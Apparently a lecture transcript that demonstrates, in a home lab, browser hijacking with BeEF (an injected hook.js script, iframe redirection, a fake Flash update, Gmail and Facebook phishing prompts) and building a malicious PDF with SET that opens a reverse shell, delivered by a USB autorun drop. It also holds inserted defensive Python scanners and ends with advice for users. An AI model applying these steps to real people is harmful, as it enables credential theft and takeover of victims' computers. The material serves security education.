Welcome back, everyone. Before we really get started, I wanted to give you a demonstration of how hackers can hack. It's not really a demonstration about how to hack necessarily, but just talking about some techniques that hackers can use to take over systems, to get access to systems, what they can do once they actually take over those systems. Yeah, so I just wanted to give you an idea of kind of how easy it is, but also sometimes how hard it is to be able to really take over somebody's computer and be able to use somebody else's computer to do different things, or steal information or whatever. So what I'm using to, I guess, take advantage of a browser is, in Kali Linux, there's a tool called BeEF, and it's the Browser Exploitation Framework project. Most, or let's say, a lot of applications are becoming web-based, and that means that people are using browsers as kind of like the main tool, the main tool for accessing their data, accessing information, communication, all of these things go through the browser now. We don't really download a lot of different applications onto our computer and then run those applications, some people still do, but a lot of apps are now available online, and they can be accessed from a browser. Because of that, the browser has become a very common target for hackers to basically get access to things. So one exploit I'll show you, basically I chose this because hacking really isn't very visual. Looking at lines of code or looking at the command line by itself doesn't really show you anything. You can just see commands going on, and most of the time the commands fail, and yeah, so it's not very visually interesting. So I hope what I'm going to show you now is visually interesting for you.
So the situation that I have set up is basically taking over someone's browser and then running different code on their browser to be able to basically just run commands on their computer, use their browser to do bad things, steal their credentials, like logins, passwords, things like that. So I just wanted to show kind of how this is working. So I'm using in Linux, in Kali Linux, which you can download. There's also the BeEF control panel, yeah, and it's fairly relatively easy to use. I'm using it inside VirtualBox as one of my host systems. And the IP address for this system is 10.1.0.237. So this is on my internal network. If you try this, don't try it on random people's computers. Set up your own local test network and try it on your own computers. Do not hack other people without their permission, okay? So 10.1.0.237 is my local IP address for the, let's say, the hacker's computer. I have a web server running on the IP address 10.1.0.232. That's where a web server on my internal network, 232. And then I have a Windows 10 computer and it has an IP address of 10.1.0.233. Now, to be able to do most of these attacks or to be able to do a lot of these attacks, the victim's computer has to be able to connect back to the attacker's computer. So I need the victim's computer to be able to connect to 10.1.0.237. So inside the Windows computer, I'm going to do ping 10.1.0.237. And what ping will do is basically send traffic to the computer at 10.1.0.237. So 10.1.0.237 is a special unique identifier for this computer. And if I can ping it, then that means they can communicate both ways and I can. So most of the time, the attacker's computer would have a public IP address. And that means that any computer on the internet would be able to connect to it. And my internal network, I just need to make sure that the victim's computer can contact my attacking computer. So inside BeEF, basically this exploits different types of browsers. And whenever you run BeEF, then it gives you a script.
So basically the hook that it wants you to add to some website, whether it's your own website or whether you've hacked a website or taken over a website, you should add this particular hook in there. And this IP address is the IP address wherever I'm hosting this hook.js software. And this is just JavaScript code that basically gets injected into a web page. Okay, if you don't know about JavaScript, you don't really have to know how to code JavaScript, but the point is that whenever you load up a website, code also gets loaded with that website. So what we're essentially doing is adding this code or this script to a website. And once we do that, then we can use that code to kind of take over the browser. That's the goal at least, okay? So whenever I start up BeEF, it gives me this hook script location. And then I have actually, let me show that real quick. So I've created a web page on my server called test.html. And test.html, if you can see this, let me blow it up a little bit. test.html is just HTML body and then this malicious script pointing back to our attacker's workstation on port 3000 to hook.js. And then just some text that says this is a bad web page and then it has a link to a website, that's it. Okay, so next we need to, basically, once I have that web page up, I need to get somebody to actually visit that web page. And once they visit that web page, then if they're using a vulnerable browser, then they will be attacked. So I have actually Internet Explorer, so on Windows, this is Internet Explorer open. And I'm using Internet Explorer specifically because a lot of Koreans still use Internet Explorer and a lot of websites require you to use Internet Explorer, but it's still quite vulnerable. So really, websites should be upgrading their software, so users don't have to use Internet Explorer anymore and at least can move to Edge. But Microsoft Edge and Internet Explorer are actually quite different.
Internet Explorer has a lot of vulnerabilities, but yeah. So anyway, I'm using Internet Explorer now just to illustrate hacking essentially. So we need to go to the malicious website, sorry. So 10.1.0.232/test.html. So this is the malicious web page. Now, if you just went to this web page, this is a bad web page with a cool link. But it just looks like a normal web page, actually. You don't see any malicious code. Nothing is really going on, nothing too strange, right? But you notice back in our control panel, we now have online browsers. We have a browser that's hooked and it looks like a Windows browser, Internet Explorer, and we get some information about it. So if I click on this, that means that because we've hooked it, this browser can now be controlled from the BeEF control panel, okay? So if we look down here, BeEF gives us information about the browser. So browser name, Internet Explorer, version 11. So Internet Explorer 11, the UA string tells us quite a bit, or I thought it did. No, I was looking at language. So for example, en-US, that's the default language. There's a Shockwave Flash installed. Looks like it's on Windows. So Flash, yes, WebSockets, yes, no WebRTC, session cookies, yes, persistent cookies, yes. And then a little bit more information about hooked, about how it's hooked. So this is just giving us information about the browser. And all the user had to do was go to this webpage, right? So I can send, let's say I shared this webpage on Facebook. Maybe a lot of people would have clicked on that link and now as long as they stay on this webpage, I potentially have access to a lot of their browser functions, okay? So now we can start to try to do things with the computer, okay? So I will go to, now that I have the browser hooked, I will go to the Commands tab. And under the Commands tab, let me expand this a little bit. So under the Commands tab, there's a lot of different things we can do.
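The hook the lecture describes is an ordinary script tag whose src points at a host that is not the website's own, so a site owner can find an injected hook by scanning their pages for off-origin script and iframe sources. The following check is an added example written for this transcript, not code from BeEF or the lecturer; the sample HTML is constructed to mirror the test.html described above (the 10.1.0.237:3000 host is the attacker machine named in the lecture, and the allow-list parameter is this example's own idea), and it uses only the Python standard library.

```python
"""Find script and iframe sources on an HTML page that do not belong to the page's own origin.

Defender's check: run it over your own pages to spot an injected hook like the one described.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the lecture's test.html (not the real file).
SAMPLE_HTML = """<html><body>
<script src="http://10.1.0.237:3000/hook.js"></script>
<script src="/static/site.js"></script>
<p>this is a bad web page with a <a href="https://example.com">cool link</a></p>
</body></html>"""


class _SourceCollector(HTMLParser):
    """Collects the src attribute of every <script> and <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.sources = []  # list of (tag, src)

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe"):
            src = dict(attrs).get("src")
            if src:
                self.sources.append((tag, src))


def find_foreign_sources(html, page_origin, allowed_hosts=()):
    """Return (tag, src) pairs whose host differs from page_origin and is not allow-listed.

    page_origin is a URL such as "http://10.1.0.232". Relative srcs are same-origin and
    are skipped; protocol-relative srcs ("//host/x.js") carry a netloc and are checked.
    """
    collector = _SourceCollector()
    collector.feed(html)
    own_netloc = urlparse(page_origin).netloc
    findings = []
    for tag, src in collector.sources:
        parsed = urlparse(src)
        if not parsed.netloc:
            continue  # relative URL, served by the page's own origin
        if parsed.netloc == own_netloc or parsed.hostname in allowed_hosts:
            continue  # own origin or a known CDN/partner host (hypothetical allow-list)
        findings.append((tag, src))
    return findings


if __name__ == "__main__":
    for tag, src in find_foreign_sources(SAMPLE_HTML, "http://10.1.0.232"):
        print(f"foreign {tag} source: {src}")
```

A static scan like this catches the hook tag sitting in the served HTML, which is the case the lecture shows. The iframe that later replaces the page content is created at runtime by the hook, so the static scan will not see it; the control there lies with the framed site's own anti-framing response headers.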
So first we'll look at browser and we can try to detect a lot of different types of software installed on the computer. And the reason I might want to detect different types of software is because I might want to take advantage of a vulnerability in that software or send a file. So for example, if I can detect Microsoft Office is installed on a computer, then I know I can send data, I guess, to that computer, or an attack to that computer that might compromise the system, okay? So next, let's see, detect toolbars. I can see if there's any vulnerable toolbars on here, VLC, a media player. We can do browser fingerprinting, remove hook, try to get access to webcams. Again, I'm in a virtual environment, so that kind of stuff doesn't really work. Detect ActiveX, that might be useful if I want to send an ActiveX attack or vulnerability, detect pop-up blockers. So if a pop-up blocker is installed and enabled, then certain types of attacks won't work. So I might do, I might run these commands very quickly to just make sure or kind of get more information or intelligence about the computer and how it's connected. We can also try to get cookies for the domain, which is information about, for example, logins, potentially, session storage, yeah. Let's see, so what I want to do next, oops, what I want to try to do is Chrome extensions, we're actually attacking Internet Explorer, so we don't need to use Chrome extensions. If we look at exploits, exploits mostly deal with taking over different types of firewalls, home routers, things like that. NAS devices, ActiveX command execution, so if ActiveX is installed, if this browser has ActiveX installed, then we can do that. Taking over cameras on the local network, not the camera in the computer, and then a couple other things.
Let's see, I was looking for hosts, so again, more intelligence gathering, trying to get the location, getting the internal IP, so I might be able to get the internal IP of the computer, and then I would know what IP range is potentially to attack. Okay, so once the browser is hooked, we can go through and get some intelligence information about the browser, about the computer, and one thing that I want to do is if, or want to say, I guess, is if the user, let's say they click on this link and they browse away from my web page, then eventually, if we refresh this, if we refresh, then the browser should go offline, or it should show up as offline. That means it's no longer hooked and I can no longer take it over. Right, okay, it's going to take a while before it registers. So, if we go back, so now the browser is on the web page, again, the infected web page, so we still have the online browser, one of the things I want to do is to be able to keep some sort of persistence, right? So, what I can try to do is go to browser and hooked domain and then do something called redirect browser. Let me try to expand this. Redirect browser with an iframe, okay? So, redirect browser iframe and then give it the IP address of this local computer, which was 237. So, 10.1.0.237 and then we want to redirect to, let's say koreatimes.com. Okay, so let me pull this over a little bit. Now, watch what happens to the test web page whenever I click execute. So, this is the attacker's computer, this is the victim's computer. So, if I click execute, then you notice that it's redirected the victim's computer to koreatimes.com. However, if you look in the address bar, you can still see the infected or the malicious website, right? So, it just redirected but it's using something called an iframe to show koreatimes.com while still giving the attacker access to the system.
So, now the attacker or the victim, I should say, can click on any of the stories and view all the stories but look, the domain is still the same. So, if I'm the attacker, I can still run any of these commands against the suspect. So, now that I've kind of got the victim, now that I've got the victim in, I guess, a bad place, I've taken over their browser and I've redirected them to a website. So, now hopefully they'll take time to read a story and I can try to take over their system while we're doing it. I can go in and try to do things like looking at the host. I want to detect if this computer is actually in a virtual machine. So, is the victim running in a virtual machine or not? Now, why would we be interested in that? If I click execute, click on the command, result, virtualized. So, this computer is in a virtual machine and we know that because the height and width is non-standard. So, the reason I might want to do that is because maybe somebody is going to my website like an antivirus company and testing my website for malicious code. Well, if it's in a virtual system, if it's in a virtual machine, then I can know that something strange is going on and not run the attacks. So, we can do a lot of different things. Let's see if detect software shows anything interesting. Probably not because there's not really much installed software. Yeah, okay. Physical location won't work. System info might work. Yeah, it's not going to work. Okay, so there's a couple of other things that I can do. A lot of these will only work on maybe older browsers or specific types of browsers or particular plugins in a browser. So, we've already so far taken over the browser and then redirected the user to a web page that just looks like a normal web page. They can browse around a news website or Facebook or whatever it is. Imagine that I sent you a link to Facebook and then you logged in and I, you know, you kept Facebook or you kept your mail up the entire time.
I could still be, I guess, attacking your system. If we go into, so what I really wanted to show was social engineering. So, imagine that you're viewing this news website and everything looks normal. And this is a little bit suspicious, but I would use a different name or domain name if I'm looking at this. And you're reading this story about Indian head peak, I don't know. You're reading some story. Then, all of a sudden, the user wants to try to steal your Facebook credentials, your Facebook passwords. So, we can do something called simple hijacker and then choose the template we want, where was it? Let's do fake Flash update actually. So, maybe Korea Times uses Flash. So, we can do something like 10.1.0.237, was it? And then we have a payload and then this is basically a program that we want the user to download. Okay, so while the user is looking at pictures of rocks and things like that, then we can execute this command. And then all of a sudden Adobe Flash Player is available. Do you want to install it? Well, you click install and then whatever I, whatever program I put in this location, the user will download it. So, if I just call it Adobe Flash Player, then most people would save it and install it onto their computer, but it's actually a virus, right? So, this is called BeEF Master Zip. Obviously, that's not something that a user should download and install. And it could be called Flash Player. So, it looks like it's a legitimate download. Again, let me execute that. I'm gonna cancel this. If I execute that again, look at how realistic this looks. I mean, this looks like it's probably Facebook and most people are trained to just kind of install. So, most people would install this and really they shouldn't be downloading and installing that. But if you're just browsing this webpage and that pops up, you'd probably install it. Let's look at another one. So, let's say Google Phishing, for example. So again, I need to put in the attacker's IP address.
Most of the time, it's not gonna be the attacker's actual computer, but 237, okay? Gmail logout, okay, execute, and then it has redirected us. So, let's say it went to the news website and then after a little bit, you got redirected to a Google Mail login. So, then you have to put in your username again and I'll just say test, and then password test123. And then sign in, would you like to store your password? Nope. And then enter your email or phone number, and this is actually at Google.com. So, look at it before, it was at 10.0.1.232. Yeah, well now I need to go do the thing again. It was at 10.1.0.232, and it was asking for your Google credentials. So, now if we click on this, you can see result, username, test, password, test123. So, if somebody actually put in, they were trying to access a webpage for a news website, and they got asked for their Google login information, now the attacker has it, and then it redirects you to real Google, and most people wouldn't be able to tell the difference, okay? So, now that the user's actually back at 10.1.0.232, now I need to actually redirect them again. All of this can be scripted, but I'm just going through and showing you kind of how it works. Hooked domains, I want to redirect browser to iframe. Again, put in the attacker's IP address, and redirect them to koreatimes.com, okay? Execute, so now they're on a malicious website again. Now, imagine that I could make a blog or a website and that blog or website could basically point to a malicious webpage that automatically redirects you. So, in that case, anyone who goes to my initial webpage and clicks a link would automatically get kind of hacked, and then I could redirect them to different websites. Again, look at the domain. The domain is the giveaway here. And it's actually koreatimes.com, but the domain does not match. So, we go to another webpage. Let me go back to attacking and go to, for example, pretty theft.
Pretty theft is a funny one, because let's say we can choose from Facebook, LinkedIn, Windows, YouTube, Yammer, iOS, generic, whatever. And if we do Facebook, for example, like most people have a Facebook account. Now, stealing a Facebook account by itself maybe isn't that interesting, because Facebook does a lot of checks whenever you're trying to log in from an unknown IP address. But if I can use your browser, if I can take over your browser, then maybe I can log in as you from your browser. That might be possible. So, 237, okay? So now, again, I'm looking at news, I don't know what news this is. I'm looking at it and I execute. Then it asked me, Facebook session timed out. And this looks legitimate. And a lot of news websites have Facebook, like Facebook, the icon is right here. So, it kind of makes sense, like the user is just thinking, man, I need to log back into Facebook if I want to view this. And if I click anywhere else, it doesn't go away, right? So, I kind of have to enter it. So, I just put in test and test1234. Log in and then I'm back to the webpage, no problem, right? So, it doesn't seem like anything happened. But if I go back to the suspect computer and I look at the command, then the answer was test, test1234. So, now I have your username and password. That's why two factor authentication, like for example, phone numbers or key fobs or one-time passwords are so important. Because if I can steal this information, I can log in as you, unless you have a second factor. Then I would also have to take over that second factor and it's a little bit more difficult. There's a lot of other things we can do in here. Those were kind of the most visual, so I thought I would show them. Notice that a lot of these social engineering ones, there's a lot in social engineering.
There's a lot that takes over, if we look at exploits, there's a lot that takes over wireless access points or the kind of the gateways that are very common and tries to change passwords or turn on services that let you take over the gateway. If you can get remote access to a gateway in a network, then you can potentially take over all of the computers in that network or redirect traffic or whatever it is you want to do. So, there's a lot of different attacks that we can do and a normal user would just browse the website like normal and most of the time wouldn't really know. So then if they're just browsing through, all of a sudden Facebook login pops up and they would put their information in and that would be it. Now, there are some things that websites can do to try to prevent this, but obviously Korea Times doesn't block iframes and things like that. So, there are things that websites can do to try to block this kind of thing, but this is very common and most people wouldn't really think about it whenever they're just browsing through the internet. Or if they're sent a link, maybe even from somebody that they don't know, the link might point to a malicious website that redirects them or does an iframe that redirects them to a legitimate website. So, even though it looks like a legitimate website, it's actually kind of taken over by a malicious website. So, there's a lot of frameworks that let us do a lot of different things, basically. Let's see if we can get its cookie, maybe not. So, there's a lot of frameworks. Oh, yeah, okay, so that's just the BeEF hook cookie. So, there's a lot of frameworks that help us to be able to take over and kind of manipulate users, especially through the browser. Another thing that I wanted to show, but I don't think I have time. Yeah, I don't have time. Another thing that I wanted to show is a tool, let's see, social engineering tools. So, social engineering, it's called the Social Engineering Toolkit.
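The "things that websites can do" mentioned above are response headers: a site that sends `Content-Security-Policy: frame-ancestors 'none'` (or the older `X-Frame-Options: DENY`) refuses to be shown inside another origin's iframe, and a restrictive `script-src` stops an injected off-origin script tag from loading. The audit below is an added example written for this transcript, not BeEF or lecture code; the header sets are constructed samples and the classification rules (wildcard list, treatment of `data:`) are this example's own simplifications of the CSP specification.

```python
"""Audit HTTP response headers for anti-framing and script-source controls."""

# Source expressions that effectively permit any origin.
WILDCARDS = {"*", "http:", "https:"}


def parse_csp(value: str) -> dict:
    """Split "a b c; d e" into {"a": ["b", "c"], "d": ["e"]} (directive names lower-cased)."""
    directives = {}
    for part in value.split(";"):
        tokens = part.strip().split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives


def _lower_headers(headers: dict) -> dict:
    return {k.lower(): v for k, v in headers.items()}


def framing_protection(headers: dict):
    """Return "csp", "xfo", or None when any site may embed the page in an iframe."""
    h = _lower_headers(headers)
    csp = parse_csp(h.get("content-security-policy", ""))
    ancestors = csp.get("frame-ancestors")
    if ancestors is not None:
        # When frame-ancestors is present, browsers ignore X-Frame-Options entirely.
        allowed = {a.strip("'").lower() for a in ancestors}
        return "csp" if allowed and not (allowed & WILDCARDS) else None
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        return "xfo"
    return None


def script_sources_restricted(headers: dict) -> bool:
    """True when CSP confines scripts to explicitly listed sources (no wildcard, no unsafe-inline)."""
    csp = parse_csp(_lower_headers(headers).get("content-security-policy", ""))
    sources = csp.get("script-src", csp.get("default-src"))  # script-src falls back to default-src
    if not sources:
        return False
    lax = {s.strip("'").lower() for s in sources} & (WILDCARDS | {"unsafe-inline", "data:"})
    return not lax


# Constructed sample responses, weakest to strongest (not captured from any real site).
SAMPLES = {
    "no headers": {},
    "legacy header only": {"X-Frame-Options": "SAMEORIGIN"},
    "csp": {"Content-Security-Policy":
            "default-src 'self'; script-src 'self' https://cdn.example; frame-ancestors 'none'"},
    "csp overrides xfo": {"X-Frame-Options": "DENY", "Content-Security-Policy": "frame-ancestors *"},
}

if __name__ == "__main__":
    for label, hdrs in SAMPLES.items():
        print(f"{label:20} framing={framing_protection(hdrs)!s:5} "
              f"scripts restricted={script_sources_restricted(hdrs)}")
```

The fourth sample is the trap worth remembering: once `frame-ancestors` is present, `X-Frame-Options: DENY` no longer counts, so a permissive CSP silently undoes the legacy header. Note that these headers protect the legitimate site from being framed; they do nothing for a page the attacker controls, which is why the user-side advice in the lecture (look at the domain in the address bar) still matters.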
Really, I guess, easy to use and it can do a lot of attacks as well. So, for example, select what you want to do, social engineering attacks. Yeah, we want to do social engineering attacks. So, let's do one social engineering. I want to do an infectious media generator, right? So, basically generating files with malware inside of them. So, I click three. And then the type of exploit that I want to run is a file format exploit. So, one, IP address for the reverse payload. I enter the attacker's IP address. And then the payloads that are currently available are all of these. Now, some of these will work better than others, depending on who your target is or who the target is. But, for example, maybe Adobe PDF Embedded EXE social engineering. I can tell you that Windows, what was it called? Windows Defender, Windows Defender. Yeah, Windows Defender does detect Adobe PDF Embedded EXE social engineering. But, basically, what this does is creates a PDF with an embedded executable that is malicious. So, if you open up that executable, then, or if you open up that PDF, then your computer will be kind of infected and the attacker can take it over. So, let's just generate that because if somebody receives a PDF, they're very likely to open it, right? And if they don't have an antivirus installed or some sort of way to check it, they'll probably fall victim to it. So, we'll do 13. I can use my own PDF for the attack. So, if I already have a document that I want to send somebody, I can use that or I can use a blank PDF. People will probably open it either way. So, I'm going to generate a blank one. And then this is the type of reverse shell that I can create or the type of connection back to my computer. So, what this does is basically says if the victim opens up the PDF, make the victim's computer connect back to the attacker's computer. That way, the attacker can maybe upload files or steal information or whatever they want to do.
They basically get full access or almost full access to the computer at this stage. So, let's just do a normal reverse TCP shell. Then I put in the suspect's password again, or IP address, sorry. And then the port that I want to connect back on and 443 is for HTTPS. So, it's expecting kind of encrypted data and a lot of firewalls don't block 443 outgoing or don't even check 443 outgoing because it's very common that traffic is flowing over 443. So, we'll keep that. And then now, hopefully my virtual machine doesn't crash, but it's generating the PDF with a malicious executable inside of it. Now, like I said, if you're using a halfway decent antivirus on Windows, then this malware should be caught. But that being said, if you're using an older system, if you don't have an updated antivirus, maybe it won't be caught. And that means that whenever you run it, especially if you're using Adobe or an older version of Adobe Reader, then your system could be taken over. So, now it's generated the PDF inside our /root/.set folder. And yeah, we can go in there and it says, do you want to create a listener right now? We'll say yes. And then it will open up Metasploit and start a connection. And then it will just sit there listening for connections to come in. So now, once that's ready, all I have to do is let's go back. If I do, I'm in the set directory. So if I go to autorun, there's this autorun.inf. So if you put this on a USB stick or a CD or something like that and give it to somebody or drop it in front of their office, then whenever they insert that USB stick into their computer, then autorun will automatically open up this PDF. Or you can just email this PDF to them. It might get flagged by an antivirus, but you could email it in some way to them. And whenever they open up this PDF document, then their computer will make a connection back to your or the attacker's computer.
And once that connection has been made, then the attacker basically has full access to your computer. So these attacks are really common. Basically, people generate these malicious files, and then they just sit there waiting for people to click on them. And it works pretty well, actually. Another way is to take over a vulnerable website and then inject some malicious code into that website. So that way anyone visiting that website, you can take over their browser just like we did before. Yeah. So what can the users do about this? Well, not much really. I mean, some of this, like for the PDF, for example, the thing that the user can do is not open PDFs from people who they don't know, or make sure that they scan every PDF before or open PDFs on maybe a virtual system, not your main computer. So if you're getting emails, for example, from a public email address for sales or something like that, then have a virtual computer that receives those public emails that you can open up documents in that's non-persistent. Then any information that's actually needed, you can forward that on whenever you need to. In terms of browsers, the best thing you can do is install a browser that automatically updates like Chrome, like Firefox, maybe even Edge, but make sure you're always using the newest browser. Chrome has a lot of built-in security features. All of them are thinking about security a little bit more. I think Chrome, through a couple of the tests, Chrome usually comes out pretty good in terms of security, although it is vulnerable to certain types of things. Also be aware of different vulnerabilities inside plugins for each type of browser. So browser plugins can leak data. They can have errors, and instead of attacking the browser, we can attack the plugins instead.
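The "scan every PDF before you open it" advice can be acted on with a static triage step: the embedded-EXE PDF described above has to declare an embedded file and some action that runs when the document opens, and those show up as PDF name objects such as `/EmbeddedFile`, `/Launch` and `/OpenAction`. The scanner below, in the style of the well-known pdfid approach, is an added example written for this transcript, not code from SET, BeEF or the lecturer. The sample "PDF" is a constructed skeleton that only declares those names; it is not a working document and contains no executable content. The name list and the best-effort stream decompression are this example's own choices.

```python
"""Static PDF triage: count name objects associated with payload delivery before opening a file."""
import re
import zlib

# PDF name objects that warrant a closer look (quarantine or open in a disposable VM).
RISKY_NAMES = {
    b"/EmbeddedFile": "embedded file (the lecture's embedded-EXE case)",
    b"/Launch": "launch action that can start an external program",
    b"/OpenAction": "action run when the document opens",
    b"/AA": "additional (automatic) actions",
    b"/JavaScript": "JavaScript action",
    b"/JS": "JavaScript code",
    b"/RichMedia": "rich media (Flash) content",
}

# Constructed sample: declares an embedded file and an open action, nothing else.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R /Names << /EmbeddedFiles 5 0 R >> >> endobj
3 0 obj << /Type /EmbeddedFile /Length 0 >> stream
endstream endobj
4 0 obj << /S /Launch /F (placeholder) >> endobj
%%EOF"""

# Constructed sample whose only risky name is hidden inside a FlateDecode stream.
SAMPLE_COMPRESSED_PDF = b"%PDF-1.4\nstream\n" + zlib.compress(b"/JS (placeholder)") + b"\nendstream\n%%EOF"


def _unescape_names(data: bytes) -> bytes:
    """Resolve #xx hex escapes in PDF names, e.g. /Em#62eddedFile -> /EmbeddedFile."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)


def _inflated_streams(data: bytes):
    """Best-effort decompression of stream bodies so names inside object streams are visible."""
    for m in re.finditer(rb"stream\r?\n(.*?)\r?\nendstream", data, re.S):
        try:
            yield zlib.decompress(m.group(1))
        except zlib.error:
            continue  # not Flate-compressed (or not a stream at all); skip


def triage_pdf(data: bytes) -> dict:
    """Return {name: count} for every risky name found in the raw file or its inflated streams."""
    text = _unescape_names(data) + b"".join(_inflated_streams(data))
    hits = {}
    for name in RISKY_NAMES:
        # Names end at a delimiter, so /EmbeddedFiles (the catalog entry) must not count as /EmbeddedFile.
        pattern = re.escape(name) + rb"(?![A-Za-z0-9])"
        count = len(re.findall(pattern, text))
        if count:
            hits[name.decode()] = count
    return hits


if __name__ == "__main__":
    for name, count in triage_pdf(SAMPLE_PDF).items():
        print(f"{name:14} x{count}  {RISKY_NAMES[name.encode()]}")
```

A hit is a reason to treat the file the way the lecture suggests (open it only in a non-persistent VM, or not at all), not proof of malice: legitimate forms use `/JS` and attachments use `/EmbeddedFile`. Conversely, an empty result is not a clean bill of health, since names can be split across object streams with other filters; this triage is a cheap first gate in front of a proper antivirus scan.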
So going over all of the different types of attacks that hackers can do would take a very long time, but I hope you've gotten an idea of basically how attackers somewhat can manipulate your computer, even if you're not necessarily going to really bad websites. If they can take over a website that you do go to, then they can still potentially get access to different parts or information on your computer. And it's relatively easy to do, and all the tools I used were also free. I'm not condoning going out and hacking people, but especially for security researchers, you have to know at least generally how these kinds of attacks work. So I hope that was an interesting introduction into basically what some of the things that hackers can do are and some of the tools that are out there. So thank you very much.